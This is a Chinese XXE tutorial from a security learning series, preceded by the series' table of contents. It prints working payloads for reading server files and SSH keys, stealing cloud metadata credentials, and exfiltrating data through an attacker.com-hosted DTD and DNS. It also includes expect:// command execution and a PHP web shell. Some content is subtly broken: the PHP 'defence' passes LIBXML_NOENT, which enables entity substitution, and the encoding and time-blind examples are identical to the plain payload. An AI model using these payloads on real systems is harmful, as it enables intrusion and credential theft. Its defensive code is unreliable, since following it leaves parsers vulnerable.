公开文集
0x01 SRC 资产管理系统
0x02 Web 漏洞案例库
0x03 小程序漏洞案例库
第一章:小程序渗透基础
1.1 微信小程序反编译与动态调试
1.2 微信小程序强制开启开发者模式
0x99 信息安全学习体系
01-网络安全基础
Day-001-TCP-IP协议栈安全分析
Day-002-DNS协议安全与DNS劫持攻防
Day-003-IPv6 安全基础与过渡
Day-004-HTTP-HTTPS协议深度解析
Day-005-网络嗅探与流量分析技术
Day-006-防火墙原理与配置实践
Day-007-网络地址转换 NAT 安全分析
Day-008-路由协议安全 RIP-OSPF-BGP
Day-009-VLAN 安全与 VLAN-Hopping
Day-010-无线网络基础与安全 802.11
Day-011-网络访问控制 802.1X-NAC
Day-012-网络分段与微隔离设计
Day-013-负载均衡器安全配置
Day-014-CDN安全与防护
Day-015-NTP安全
Day-016-DHCP安全与攻击防护
Day-017-ICMP协议安全分析
Day-018-网络协议模糊测试基础
Day-019-网络流量基线建立
Day-020-网络取证基础
Day-021-网络入侵检测系统 NIDS
Day-022-网络入侵防御系统 NIPS
Day-023-网络流量加密与解密
Day-024-网络协议逆向工程基础
Day-025-网络性能与安全权衡
Day-026-SDN 安全
Day-027-网络虚拟化安全
Day-028-网络欺骗技术
Day-029-网络威胁情报应用
Day-030-网络容量规划与安全
Day-031-网络安全架构设计实战
02-Web 安全
Day-032-OWASP-Top-10-2021详解
Day-033-SQL 注入原理与手工检测
Day-034-SQL注入进阶报错注入与盲注
Day-035-XSS跨站脚本攻击基础
Day-036-XSS 进阶绕过与利用
Day-037-XSS进阶绕过与利用
Day-038-CSRF 跨站请求伪造
Day-039-文件上传漏洞
Day-040-反序列化漏洞基础
Day-041-PHP反序列化深入
Day-042-Java反序列化深入
Day-043-SSTI 服务端模板注入
Day-044-文件包含漏洞 LFI-RFI
Day-045-命令注入漏洞
Day-046-XXE-XML 外部实体注入
Day-047-反序列化漏洞进阶
Day-048-API 安全基础
Day-049-API认证与授权安全
Day-050-API漏洞挖掘实战
Day-051-文件上传漏洞进阶
Day-052-反序列化漏洞实战
Day-053-Web 安全综合实战
Day-054-移动安全基础
Day-055-Android 应用安全测试
Day-056-iOS 应用安全测试
Day-057-移动应用综合实战
Day-058-云安全基础
Day-059-AWS 安全实战
Day-060-Azure 安全实战
Day-061-GCP 安全实战
Day-062-云安全综合实战
Day-063-容器安全基础
Day-064-Docker 安全实战
Day-065-Kubernetes 安全实战
Day-066-容器安全综合实战
Day-067-API 安全进阶
Day-068-服务端请求伪造 SSRF 深入
Day-069-文件上传漏洞进阶
Day-070-反序列化漏洞实战进阶
Day-071-业务逻辑漏洞深入
Day-072-前端安全深入
Day-073-Web 安全综合实战
Day-074-云安全进阶
Day-075-移动安全进阶
Day-076-API 安全进阶
Day-077-前端安全进阶
Day-078-业务逻辑漏洞进阶
Day-079-反序列化漏洞实战进阶
Day-080-文件上传漏洞实战进阶
Day-081-SSTI 服务端模板注入进阶
Day-082-XXE-XML 外部实体注入进阶
Day-083-SSRF 服务端请求伪造进阶
Day-084-命令注入漏洞进阶
Day-085-文件包含漏洞进阶
Day-086-反序列化漏洞实战进阶
Day-087-文件上传漏洞实战进阶
Day-088-SSTI 服务端模板注入实战进阶
Day-089-XXE-XML 外部实体注入实战进阶
Day-090-SSRF 服务端请求伪造实战进阶
Day-091-命令注入漏洞实战进阶
Day-092-Web 安全综合实战
Day-093-GraphQL 安全
Day-094-JWT 与 OAuth2 安全
03-系统安全
Day-095-系统监控与检测
Day-096-主机防火墙配置
Day-097-系统审计与合规
Day-098-Linux 系统安全进阶
Day-099-Windows 系统安全进阶
Day-100-容器安全进阶
Day-101-容器编排安全进阶
Day-102-Linux 内核安全
Day-103-Windows 内核安全
Day-104-系统安全总结与实战
Day-105-Linux 系统安全基础
Day-106-Windows 系统安全基础
Day-107-容器安全基础
Day-108-系统加固技术
Day-109-日志分析技术
Day-110-威胁狩猎技术
04-应用安全
Day-111-安全编码规范
Day-112-输入验证技术
Day-113-输出编码技术
Day-114-错误处理安全
Day-115-会话管理安全
Day-116-认证安全
Day-117-授权安全
Day-118-数据保护安全
Day-119-日志安全
Day-120-API 安全
Day-121-微服务安全
Day-122-新兴技术安全概论
Day-123-DevSecOps 流水线安全
Day-124-云原生安全架构
Day-125-API 安全最佳实践
Day-126-安全编码规范
Day-127-SDL 安全开发生命周期
Day-128-威胁建模实战
Day-129-安全需求分析
Day-130-安全架构设计
Day-131-安全编码实践Java
Day-132-安全编码实践Python
Day-133-代码审计方法论
Day-134-静态代码分析SAST
Day-135-动态应用测试DAST
Day-136-交互式测试IAST
Day-137-软件成分分析SCA
Day-138-依赖漏洞管理
Day-139-安全测试自动化
Day-140-漏洞管理与响应
Day-141-应用安全总结与展望
Day-142-OWASP-Top10-2024 详解
Day-143-CWE-Top25 分析
Day-144-漏洞挖掘方法论
Day-145-模糊测试技术
Day-146-逆向工程基础
Day-147-漏洞利用开发基础
Day-148-漏洞复现与验证
Day-149-漏洞披露流程
Day-150-CVE 申请与管理
Day-151-漏洞赏金计划
Day-152-等保2.0详解
Day-153-GDPR 合规实践
Day-154-数据安全法解读
Day-155-个人信息保护法与合规指南
Day-156-个人信息保护法解读
Day-157-ISO-27001 信息安全管理体系
Day-158-SOC-2 合规与审计
Day-159-PCI-DSS 支付卡行业数据安全标准
Day-160-网络安全审查办法解读
Day-161-数据出境安全评估办法
Day-162-应用安全评估实战
Day-163-红蓝对抗演练
Day-164-安全应急响应
Day-165-安全运营中心建设
Day-166-应用安全总结与展望
05-密码学
Day-167-密码学基础
Day-168-对称加密算法详解
Day-169-非对称加密算法详解
Day-170-哈希函数与数字签名
Day-171-密钥管理与PKI
Day-172-TLS-SSL 协议详解
Day-173-国密算法详解
Day-174-认证与密钥协议
Day-175-随机数生成与熵源
Day-176-椭圆曲线密码学详解
Day-177-后量子密码学详解
Day-178-高级密码学主题
Day-179-密码学行业应用精选
Day-180-常用加密算法原理与实现
Day-181-密码学总结与展望
Day-182-密码学系列总结与展望
06-渗透测试
Day-183-渗透测试方法论
Day-184-信息收集技术详解
Day-185-漏洞扫描技术详解
Day-186-漏洞利用技术详解
Day-187-渗透测试中的漏洞利用框架
Day-188-漏洞利用框架与 Metasploit 深入
Day-189-渗透测试中的 WAF 绕过技术
Day-190-渗透测试中的模糊测试技术
Day-191-渗透测试中的代码审计与静态分析
Day-192-渗透测试中的密码哈希破解技术
Day-193-渗透测试报告编写指南
Day-194-Web 应用渗透测试
Day-195-渗透测试中的 API 安全测试
Day-196-渗透测试中的 GraphQL 安全测试
Day-197-渗透测试中的前后端分离应用测试
Day-198-渗透测试中的小程序安全测试
Day-199-渗透测试中的浏览器安全测试
Day-200-OAuth-SSO安全测试
Day-201-渗透测试中的业务逻辑漏洞测试
Day-202-渗透测试中的厚客户端安全测试
Day-203-渗透测试综合实战演练
Day-204-内网渗透技术详解
Day-205-渗透测试中的内网信息收集进阶
Day-206-渗透测试中的域森林渗透技术
Day-207-渗透测试中的权限维持技术
Day-208-渗透测试中的横向移动技术
Day-209-渗透测试中的痕迹清理与反取证技术
Day-210-渗透测试中的数据窃取与 Exfiltration 技术
Day-211-渗透测试中的内部威胁与数据泄露测试
Day-212-渗透测试中的物理安全渗透
Day-213-社会工程学攻击技术
Day-214-移动应用渗透测试
Day-215-云安全渗透测试
Day-216-渗透测试中的容器与 Kubernetes 安全渗透
Day-217-渗透测试中的 Serverless 安全测试
Day-218-渗透测试中的微服务安全测试
Day-219-物联网安全渗透测试
Day-220-工业控制系统安全渗透测试
Day-221-无线网络安全渗透测试
Day-222-数据库安全渗透测试
Day-223-渗透测试中的供应链安全测试
Day-224-红队演练技术详解
Day-225-渗透测试中的红队基础设施搭建
Day-226-渗透测试中的威胁情报与狩猎
Day-227-渗透测试中的综合指纹识别技术
Day-228-自动化渗透测试技术
Day-229-渗透测试中的运维安全测试
Day-230-渗透测试中的区块链与智能合约安全测试
Day-231-渗透测试中的漏洞管理与修复验证
Day-232-渗透测试法律与合规
Day-233-后渗透攻击技术详解
Day-234-渗透测试中的人工智能应用
Day-235-漏洞利用开发深入
Day-236-云原生渗透测试深入
07-应急响应
Day-237-应急响应概述与核心概念
Day-238-应急响应流程框架
Day-239-CSIRT 团队组建与职责分工
Day-240-应急响应工具包准备
Day-241-应急响应法律与合规要求
Day-242-安全事件检测方法与指标
Day-243-云原生应急响应
Day-244-日志收集与分析技术
Day-245-网络流量分析与异常识别
Day-246-自动化响应与 SOAR
Day-247-端点监控与 EDR 技术
Day-248-威胁狩猎方法论
Day-249-威胁情报在检测中的应用
Day-250-数字取证基础与证据链管理
Day-251-内存取证技术
Day-252-磁盘取证与文件恢复
Day-253-网络取证与数据包分析
Day-254-云环境与容器取证
Day-255-恶意代码静态分析技术
Day-256-恶意代码动态分析技术
Day-257-恶意代码行为分析方法
Day-258-逆向工程基础与工具
Day-259-沙箱技术与自动化分析
Day-260-事件隔离与遏制策略
Day-261-威胁根除与系统修复
Day-262-系统恢复与数据重建
Day-263-业务连续性计划
Day-264-事件复盘与经验总结
Day-265-APT 攻击事件复盘分析
Day-266-勒索软件事件响应实战
Day-267-数据泄露事件处置流程
Day-268-内部威胁调查与取证
Day-269-综合应急响应演练
08-安全运维
Day-270-安全运营中心 SOC 概述
Day-271-安全监控指标体系
Day-272-安全告警管理
Day-273-安全可视化与仪表盘
Day-274-监控工具选型
Day-275-日志采集技术
Day-276-日志标准化与解析
Day-277-日志存储与归档
Day-278-日志分析技术
Day-279-日志合规要求
Day-280-SIEM 架构与设计
Day-281-关联规则引擎
Day-282-高级关联分析
Day-283-UEBA 用户实体行为分析
Day-284-威胁狩猎
Day-285-SOAR 基础概念
Day-286-剧本设计
Day-287-自动化响应技术
Day-288-安全工具集成
Day-289-SOAR 度量与优化
Day-290-安全基线管理
Day-291-漏洞管理流程
Day-292-补丁管理策略
Day-293-变更安全管理
Day-294-合规审计技术
Day-295-7x24 安全运营
Day-296-安全事件管理流程
Day-297-安全运营度量体系
Day-298-持续改进机制
Day-299-安全运维综合演练
Day-300-云原生安全运营
Day-301-AI 与机器学习安全运营
Day-302-安全自动化脚本实战
09-移动安全
Day-303-移动安全威胁概述
Day-304-移动设备安全架构
Day-305-移动操作系统安全模型
Day-306-移动应用权限管理
Day-307-移动端数据加密
Day-308-330-Android 安全合集
Day-309-Android 安全架构
Day-310-Android 组件安全
Day-311-Android 权限与隐私
Day-312-Android 逆向工程
Day-313-Android 应用加固
Day-314-iOS 安全架构
Day-315-iOS 应用沙盒机制
Day-316-越狱与反越狱
Day-317-iOS 逆向工程
Day-318-iOS 企业分发安全
Day-319-移动安全开发生命周期
Day-320-移动应用安全测试
Day-321-移动应用加固技术
Day-322-移动威胁防护
Day-323-移动安全合规
10-云安全
Day-324-云计算安全模型
Day-325-责任共担模型
Day-326-云安全威胁模型
Day-327-云安全合规框架
Day-328-云安全架构设计
Day-329-AWS IAM 安全
Day-330-AWS 网络安全
Day-331-AWS 存储安全
Day-332-AWS 安全监控
Day-333-AWS 安全最佳实践
Day-334-Azure AD 安全
Day-335-Azure 网络安全
Day-336-Azure 存储安全
Day-337-Azure 安全中心
Day-338-Azure 安全最佳实践
Day-339-容器安全基础
Day-340-Kubernetes 安全
Day-341-Serverless 安全
Day-342-云原生 DevSecOps
Day-343-云安全态势管理 CSPM
11-物联网工控
Day-344-物联网安全概述
Day-345-IoT 通信协议安全
Day-346-IoT 设备安全
Day-347-IoT 平台安全
Day-348-IoT 应用安全
Day-349-工业控制系统概述
Day-350-工控协议安全
Day-351-PLC 安全
Day-352-SCADA 系统安全
Day-353-工控安全防护
12-综合与总结
Day-354-安全职业发展路径
Day-355-安全技术趋势展望
Day-356-安全建设方法论
Day-357-经典攻防案例复盘
Day-358-安全学习资源指南
Day-359-信息安全行业求职指南
-
+
首页
Day-046-XXE-XML 外部实体注入
# Day 44: XXE(XML 外部实体注入) > Web 安全系列第 14 天 | 预计阅读时间:40 分钟 | 难度:★★★★☆ --- ## 清单 目录 1. [XXE 概述](#xxe 概述) 2. [XML 基础回顾](#xml 基础回顾) 3. [XXE 原理详解](#xxe 原理详解) 4. [XXE 攻击类型](#xxe 攻击类型) 5. [文件读取利用](#文件读取利用) 6. [SSRF 利用](#ssrf 利用) 7. [RCE 利用](#rce 利用) 8. [Bypass 技术](#bypass 技术) 9. [检测与利用流程](#检测与利用流程) 10. [防护策略与最佳实践](#防护策略与最佳实践) 11. [总结与思考](#总结与思考) 12. [参考资料](#参考资料) --- ## XXE 概述 ### 什么是 XXE XXE(XML External Entity,XML 外部实体注入)是一种针对 XML 解析器的攻击技术,攻击者通过定义外部实体,让 XML 解析器读取任意文件或发起网络请求。 **形象理解**: 如果把 XML 解析器比作一个图书管理员,那么: - **正常 XML** = 读者借阅图书馆内的书 - **XXE 攻击** = 读者让管理员去外面买书 - **管理员** = XML 解析器 - **后果** = 管理员真的去买了禁书(读取敏感文件或访问内网) **XXE 的危害**: ``` 1. 文件读取 - 读取服务器文件 - 读取配置文件 - 读取源代码 2. SSRF(服务端请求伪造) - 访问内网服务 - 扫描内网端口 - 访问云元数据 3. 远程代码执行 - 配合其他漏洞 - 执行系统命令 - 获取服务器权限 4. 拒绝服务 - 实体扩展攻击 - 资源耗尽 - 服务不可用 ``` **真实案例**: ``` 案例 1: 某支付平台(2018) - 漏洞:XXE - 影响:服务器文件泄露 - 手法:XML 支付请求 - 后果:敏感配置泄露 案例 2: 某电商平台(2019) - 漏洞:XXE + SSRF - 影响:内网服务暴露 - 手法:商品导入功能 - 后果:内网数据库泄露 案例 3: 某 SaaS 服务(2020) - 漏洞:XXE - 影响:云凭证泄露 - 手法:文件上传功能 - 后果:云资源被控制 ``` --- ## XML 基础回顾 ### XML 文档结构 **基本 XML**: ```xml <?xml version="1.0" encoding="UTF-8"?> <root> <element>value</element> <element attr="value">content</element> </root> ``` **XML 声明**: ```xml <?xml version="1.0"?> <?xml version="1.0" encoding="UTF-8"?> <?xml version="1.0" standalone="yes"?> ``` **XML 元素**: ```xml <element>content</element> <element attr="value">content</element> <element/> <!-- 自闭合标签 --> ``` ### DTD(文档类型定义) **内部 DTD**: ```xml <?xml version="1.0"?> <!DOCTYPE root [ <!ELEMENT root (element)> <!ELEMENT element (#PCDATA)> <!ATTLIST element attr CDATA #REQUIRED> ]> <root> <element attr="value">content</element> </root> ``` **外部 DTD**: ```xml <?xml version="1.0"?> <!DOCTYPE root SYSTEM "http://attacker.com/malicious.dtd"> <root> <element>content</element> </root> ``` ### XML 实体 **普通实体**: ```xml <?xml version="1.0"?> <!DOCTYPE root [ <!ENTITY myentity "Hello World"> ]> <root> <element>&myentity;</element> </root> <!-- 输出:Hello World --> ``` **参数实体**: ```xml <?xml version="1.0"?> <!DOCTYPE root [ <!ENTITY % param "value"> %param; ]> <root> <element>content</element> </root> ``` **外部实体**: ```xml <?xml version="1.0"?> <!DOCTYPE root [ <!ENTITY ext SYSTEM "file:///etc/passwd"> ]> <root> <element>&ext;</element> </root> <!-- 输出:/etc/passwd 内容 --> ``` --- ## XXE 原理详解 ### 为什么会发生 XXE **根本原因**: ``` 1. XML 解析器配置不当 - 启用了外部实体 - 未禁用 DTD - 未限制实体解析 2. 信任用户输入 - 直接解析用户 XML - 未验证 XML 结构 - 未过滤实体定义 3. 默认配置不安全 - 许多解析器默认启用外部实体 - 需要手动禁用 - 开发人员 unaware ``` **漏洞代码示例**: ```php <?php // - 错误做法(PHP) $xml = file_get_contents('php://input'); $doc = simplexml_load_string($xml); // - 错误做法(Python) from xml.etree import ElementTree tree = ElementTree.parse(user_input) // - 错误做法(Java) DocumentBuilderFactory factory = DocumentBuilderFactory.newInstance(); DocumentBuilder builder = factory.newDocumentBuilder(); Document doc = builder.parse(user_input); ?> ``` ### 攻击流程 ``` 步骤 1: 发现 XML 输入点 □ API 接口 □ 文件上传 □ Web Service □ 文档解析 □ 数据导入 步骤 2: 测试 XXE <!DOCTYPE root [<!ENTITY test "test">]> <root>&test;</root> 步骤 3: 探测环境 - 解析器类型 - 实体支持 - 协议支持 步骤 4: 构造 Payload - 文件读取 - SSRF - RCE 步骤 5: 利用漏洞 - 读取敏感文件 - 访问内网服务 - 执行系统命令 ``` --- ## XXE 攻击类型 ### 基于回显的 XXE **原理**: ``` XML 解析器解析外部实体, 将结果返回到响应中。 适用场景: - 解析结果在响应中显示 - 错误信息包含实体内容 - XML 数据被反射 ``` **Payload 示例**: ```xml <?xml version="1.0"?> <!DOCTYPE root [ <!ENTITY ext SYSTEM "file:///etc/passwd"> ]> <root> <element>&ext;</element> </root> ``` **响应**: ```xml <root> <element>root:x:0:0:root:/root:/bin/bash ...</element> </root> ``` ### 盲 XXE **原理**: ``` XML 解析器解析外部实体, 但结果不返回到响应中。 利用方法: - 时间延迟 - DNS 外带 - HTTP 外带 - 错误信息 ``` **时间盲注**: ```xml <?xml version="1.0"?> <!DOCTYPE root [ <!ENTITY ext SYSTEM "file:///etc/passwd"> ]> <root> <element>&ext;</element> </root> <!-- 通过响应时间判断 --> ``` **DNS 外带**: ```xml <?xml version="1.0"?> <!DOCTYPE root [ <!ENTITY ext SYSTEM "http://$(whoami).attacker.com/"> ]> <root> <element>test</element> </root> <!-- 查看 DNS 日志 --> ``` ### 错误型 XXE **原理**: ``` 通过错误信息泄露数据。 解析器在解析外部实体时出错, 错误信息包含实体内容。 ``` **Payload 示例**: ```xml <?xml version="1.0"?> <!DOCTYPE root [ <!ENTITY ext SYSTEM "file:///etc/passwd"> <!ENTITY % param "<!ENTITY % error SYSTEM 'file:///nonexistent/%ext;'>"> %param; %error; ]> <root>&ext;</root> ``` **错误响应**: ``` Error: Could not load file: /nonexistent/root:x:0:0:root:/root:/bin/bash... ``` --- ## 文件读取利用 ### 读取本地文件 **Linux 文件**: ```xml <?xml version="1.0"?> <!DOCTYPE root [ <!ENTITY ext SYSTEM "file:///etc/passwd"> ]> <root> <element>&ext;</element> </root> ``` **敏感文件路径**: ``` /etc/passwd → 用户列表 /etc/shadow → 密码哈希(需要 root) /proc/version → 系统版本 /proc/self/environ → 环境变量 /root/.ssh/id_rsa → SSH 私钥 /var/log/auth.log → 认证日志 ``` **Windows 文件**: ```xml <?xml version="1.0"?> <!DOCTYPE root [ <!ENTITY ext SYSTEM "file:///C:/Windows/win.ini"> ]> <root> <element>&ext;</element> </root> ``` **敏感文件路径**: ``` C:\Windows\win.ini C:\Windows\system32\drivers\etc\hosts C:\Users\username\.ssh\id_rsa C:\Program Files\...\config.xml ``` ### 读取 PHP 源码 **PHP 伪协议**: ```xml <?xml version="1.0"?> <!DOCTYPE root [ <!ENTITY ext SYSTEM "php://filter/convert.base64-encode/resource=/var/www/html/index.php"> ]> <root> <element>&ext;</element> </root> ``` **响应(Base64 编码)**: ``` PD9waHAKZWNobyAiSGVsbG8gV29ybGQiOwo/Pg== ``` **解码后**: ```php <?php echo "Hello World"; ?> ``` **其他伪协议**: ``` php://filter/convert.base64-encode/resource=file php://filter/zlib.deflate/convert.base64-encode/resource=file compress.zlib://file compress.bzip2://file ``` ### 读取 Java 类文件 **Java 类路径**: ```xml <?xml version="1.0"?> <!DOCTYPE root [ <!ENTITY ext SYSTEM "file:///var/www/html/WEB-INF/classes/com/example/User.class"> ]> <root> <element>&ext;</element> </root> ``` **反编译类文件**: ``` 使用 JD-GUI、CFR 等工具 反编译获取源代码 ``` --- ## SSRF 利用 ### 内网扫描 **扫描内网端口**: ```xml <?xml version="1.0"?> <!DOCTYPE root [ <!ENTITY ext SYSTEM "http://192.168.1.1:22/"> ]> <root> <element>&ext;</element> </root> ``` **批量扫描**: ```xml <?xml version="1.0"?> <!DOCTYPE root [ <!ENTITY ext1 SYSTEM "http://192.168.1.1:22/"> <!ENTITY ext2 SYSTEM "http://192.168.1.1:80/"> <!ENTITY ext3 SYSTEM "http://192.168.1.1:443/"> <!ENTITY ext4 SYSTEM "http://192.168.1.1:3306/"> ]> <root> <e1>&ext1;</e1> <e2>&ext2;</e2> <e3>&ext3;</e3> <e4>&ext4;</e4> </root> ``` ### 访问云元数据 **AWS 元数据**: ```xml <?xml version="1.0"?> <!DOCTYPE root [ <!ENTITY ext SYSTEM "http://169.254.169.254/latest/meta-data/iam/security-credentials/"> ]> <root> <element>&ext;</element> </root> ``` **获取凭证**: ```xml <?xml version="1.0"?> <!DOCTYPE root [ <!ENTITY ext SYSTEM "http://169.254.169.254/latest/meta-data/iam/security-credentials/role-name"> ]> <root> <element>&ext;</element> </root> ``` **响应(AWS 凭证)**: ```json { "Code": "Success", "AccessKeyId": "AKIAIOSFODNN7EXAMPLE", "SecretAccessKey": "wJalrXUtnFEMI/K7MDENG/bPxRfiCYEXAMPLEKEY", "Token": "AQoDYXdzEJr..." } ``` **GCP 元数据**: ```xml <?xml version="1.0"?> <!DOCTYPE root [ <!ENTITY ext SYSTEM "http://metadata.google.internal/computeMetadata/v1/instance/service-accounts/default/token"> ]> <root> <element>&ext;</element> </root> ``` **Azure 元数据**: ```xml <?xml version="1.0"?> <!DOCTYPE root [ <!ENTITY ext SYSTEM "http://169.254.169.254/metadata/instance/compute?api-version=2017-08-01"> ]> <root> <element>&ext;</element> </root> ``` ### 访问内网服务 **访问内网 Web**: ```xml <?xml version="1.0"?> <!DOCTYPE root [ <!ENTITY ext SYSTEM "http://192.168.1.100/admin/"> ]> <root> <element>&ext;</element> </root> ``` **访问数据库**: ```xml <?xml version="1.0"?> <!DOCTYPE root [ <!ENTITY ext SYSTEM "http://192.168.1.100:3306/"> ]> <root> <element>&ext;</element> </root> ``` **访问 Redis**: ```xml <?xml version="1.0"?> <!DOCTYPE root [ <!ENTITY ext SYSTEM "http://192.168.1.100:6379/"> ]> <root> <element>&ext;</element> </root> ``` --- ## RCE 利用 ### PHP RCE **expect 模块**: ```xml <?xml version="1.0"?> <!DOCTYPE root [ <!ENTITY ext SYSTEM "expect://whoami"> ]> <root> <element>&ext;</element> </root> ``` **要求**: ``` - PHP 安装了 expect 模块 - 通常默认不安装 - 需要编译安装 ``` **安装 expect**: ```bash pecl install expect ``` ### Java RCE **Java 反序列化**: ```xml <?xml version="1.0"?> <!DOCTYPE root [ <!ENTITY ext SYSTEM "http://attacker.com/malicious.ser"> ]> <root> <element>&ext;</element> </root> ``` **要求**: ``` - 应用反序列化 XML 中的对象 - 存在可利用的 Gadget 链 - 通常配合其他漏洞 ``` ### 其他 RCE **配合文件写入**: ```xml <?xml version="1.0"?> <!DOCTYPE root [ <!ENTITY ext SYSTEM "php://filter/write=string.rot13/resource=/var/www/html/shell.php"> ]> <root> <element>&ext;</element> </root> ``` **写入内容(ROT13 编码)**: ``` <?cuc flfgrz($_TRG[p]);?> ``` **解码后**: ```php <?php system($_GET['c']); ?> ``` --- ## Bypass 技术 ### WAF 绕过 **实体编码**: ```xml <!-- 十六进制编码 --> <!ENTITY ext SYSTEM "file:///etc/passwd"> <!-- 十进制编码 --> <!ENTITY ext SYSTEM "file:///etc/passwd"> ``` **参数实体绕过**: ```xml <!DOCTYPE root [ <!ENTITY % param SYSTEM "http://attacker.com/malicious.dtd"> %param; ]> ``` **malicious.dtd**: ```xml <!ENTITY % file SYSTEM "file:///etc/passwd"> <!ENTITY % eval "<!ENTITY % error SYSTEM 'file:///nonexistent/%file;'>"> %eval; %error; ``` ### 过滤器绕过 **CDATA 绕过**: ```xml <root> <![CDATA[<!DOCTYPE root [<!ENTITY test "test">]>]]> </root> ``` **注释绕过**: ```xml <root> <!-- <!ENTITY ext SYSTEM "file:///etc/passwd"> --> <element>test</element> </root> ``` **嵌套实体**: ```xml <!DOCTYPE root [ <!ENTITY a "file"> <!ENTITY b ":///etc/passwd"> <!ENTITY ext "&a;&b;"> ]> <root> <element>&ext;</element> </root> ``` --- ## 检测与利用流程 ### 手工检测 **步骤 1: 寻找 XML 输入点**: ``` □ API 接口(Content-Type: application/xml) □ 文件上传(XML 文件) □ Web Service(SOAP) □ 文档解析(Office、PDF) □ 数据导入(XML 导入) ``` **步骤 2: 测试基础 Payload**: ```xml <?xml version="1.0"?> <!DOCTYPE root [<!ENTITY test "test">]> <root>&test;</root> <!-- 如果返回 test,可能存在 XXE --> ``` **步骤 3: 测试外部实体**: ```xml <?xml version="1.0"?> <!DOCTYPE root [ <!ENTITY ext SYSTEM "file:///etc/passwd"> ]> <root>&ext;</root> <!-- 如果返回 /etc/passwd 内容,存在 XXE --> ``` **步骤 4: 观察响应**: ``` - 文件内容 → 确认 XXE - 错误信息 → 可能 XXE - 时间延迟 → 可能盲 XXE - 无变化 → 可能无 XXE ``` ### 自动化工具 **XXEinjector**: ```bash # 安装 git clone https://github.com/enjoiz/XXEinjector # 使用 ruby XXEinjector.rb --host=attacker.com --file=request.txt --path=/etc/ ``` **OXXE**: ```bash # 安装 git clone https://github.com/TheTwitchy/xxeinjector # 使用 python oxxe.py -u http://target.com/api -f request.xml ``` **Burp Suite**: ``` 1. 拦截 XML 请求 2. 发送到 Repeater 3. 修改为 XXE Payload 4. 观察响应 ``` ### 利用流程 **信息收集**: ```xml <!-- 系统信息 --> <!ENTITY ext SYSTEM "file:///etc/os-release"> <!-- 用户信息 --> <!ENTITY ext SYSTEM "file:///etc/passwd"> <!-- 网络信息 --> <!ENTITY ext SYSTEM "file:///etc/hosts"> ``` **权限提升**: ```xml <!-- SSH 密钥 --> <!ENTITY ext SYSTEM "file:///root/.ssh/id_rsa"> <!-- 配置文件 --> <!ENTITY ext SYSTEM "file:///var/www/html/config.php"> <!-- 日志文件 --> <!ENTITY ext SYSTEM "file:///var/log/auth.log"> ``` **内网渗透**: ```xml <!-- 云元数据 --> <!ENTITY ext SYSTEM "http://169.254.169.254/latest/meta-data/"> <!-- 内网服务 --> <!ENTITY ext SYSTEM "http://192.168.1.1:22/"> <!-- 数据库 --> <!ENTITY ext SYSTEM "http://192.168.1.1:3306/"> ``` --- ## 防护策略与最佳实践 ### 代码层面防护 **禁用外部实体**: ```php // PHP - libxml libxml_disable_entity_loader(true); $doc = simplexml_load_string($xml, 'SimpleXMLElement', LIBXML_NOENT); // PHP - DOMDocument $doc = new DOMDocument(); $doc->loadXML($xml, LIBXML_NOENT | LIBXML_DTDLOAD | LIBXML_DTDATTR); $doc->substituteEntities = false; ``` **Python**: ```python # 使用 defusedxml from defusedxml import ElementTree tree = ElementTree.parse(user_input) # 或使用 lxml 禁用实体 from lxml import etree parser = etree.XMLParser(resolve_entities=False, no_network=True) tree = etree.parse(user_input, parser) ``` **Java**: ```java // 禁用外部实体 DocumentBuilderFactory factory = DocumentBuilderFactory.newInstance(); factory.setFeature("http://xml.org/sax/features/external-general-entities", false); factory.setFeature("http://xml.org/sax/features/external-parameter-entities", false); factory.setFeature("http://apache.org/xml/features/disallow-doctype-decl", true); DocumentBuilder builder = factory.newDocumentBuilder(); Document doc = builder.parse(user_input); ``` **.NET**: ```csharp // 禁用外部实体 XmlReaderSettings settings = new XmlReaderSettings(); settings.DtdProcessing = DtdProcessing.Prohibit; settings.XmlResolver = null; XmlReader reader = XmlReader.Create(input, settings); ``` ### 配置防护 **禁用 DTD**: ``` 最安全的做法是完全禁用 DTD。 PHP: libxml_disable_entity_loader(true); Java: factory.setFeature("http://apache.org/xml/features/disallow-doctype-decl", true); Python: parser = etree.XMLParser(dtd_validation=False) ``` **白名单验证**: ``` 只允许预期的 XML 结构。 验证: - XML Schema - DTD 白名单 - 自定义验证器 ``` ### 运行时防护 **WAF 规则**: ``` 检测 XXE 特征: - <!DOCTYPE - <!ENTITY - SYSTEM - PUBLIC 阻断可疑请求: - 包含实体定义 - 包含外部实体 - 来源可疑 ``` **监控告警**: ``` 监控: - XML 解析调用 - 外部实体解析 - 文件访问 - 网络请求 告警: - XXE 尝试 - 敏感文件访问 - 内网扫描 ``` --- ## 实战案例分析 ### 案例 1: 支付平台 XXE **漏洞描述**: ``` 平台:某支付平台 漏洞:XXE 位置:支付请求 XML 影响:服务器文件泄露 ``` **发现过程**: ``` 1. 测试支付接口 发送正常 XML 支付请求 2. 测试 XXE 添加实体定义 <!DOCTYPE root [<!ENTITY test "test">]> 3. 确认漏洞 实体被解析 返回实体内容 4. 利用漏洞 读取配置文件 获取数据库凭证 ``` **Payload**: ```xml <?xml version="1.0"?> <!DOCTYPE payment [ <!ENTITY ext SYSTEM "file:///var/www/html/config.php"> ]> <payment> <amount>100</amount> <config>&ext;</config> </payment> ``` **修复方案**: ``` 1. 禁用外部实体 libxml_disable_entity_loader(true) 2. 验证 XML 结构 使用 XML Schema 3. 过滤输入 移除 DOCTYPE 4. 最小权限 Web 用户不能读取敏感文件 ``` ### 案例 2: 文件导入 XXE **漏洞描述**: ``` 系统:某 ERP 系统 漏洞:XXE 位置:Excel 导入功能 影响:内网服务暴露 ``` **攻击流程**: ``` 1. Excel 文件包含 XXE 制作恶意 Excel 文件 2. 上传文件 通过导入功能上传 3. 解析触发 系统解析 Excel 中的 XML 4. SSRF 利用 访问内网服务 获取敏感信息 ``` **修复方案**: ``` 1. 使用安全解析库 defusedxml 2. 禁用外部实体 配置解析器 3. 文件验证 验证文件类型 4. 网络隔离 应用服务器不能访问内网 ``` --- ## 总结与思考 ### 核心要点回顾 1. **XXE 原理** - XML 解析器配置不当 - 外部实体被解析 - 读取文件或访问网络 2. **攻击类型** - 基于回显 - 盲 XXE - 错误型 3. **防护策略** - 禁用外部实体 - 禁用 DTD - 验证输入 ### 深入思考问题 1. **为什么 XXE 依然普遍**? - 默认配置不安全 - 开发人员 unaware - 第三方库问题 2. **云环境下的风险**? - 元数据服务 - 内网服务 - 新的攻击面 3. **未来防护方向**? - 安全默认配置 - 解析器改进 - 运行时保护 ### 实战建议 **开发人员**: 1. 禁用外部实体 2. 使用安全库 3. 验证输入 4. 最小权限 **安全人员**: 1. 定期 XXE 扫描 2. 代码审计 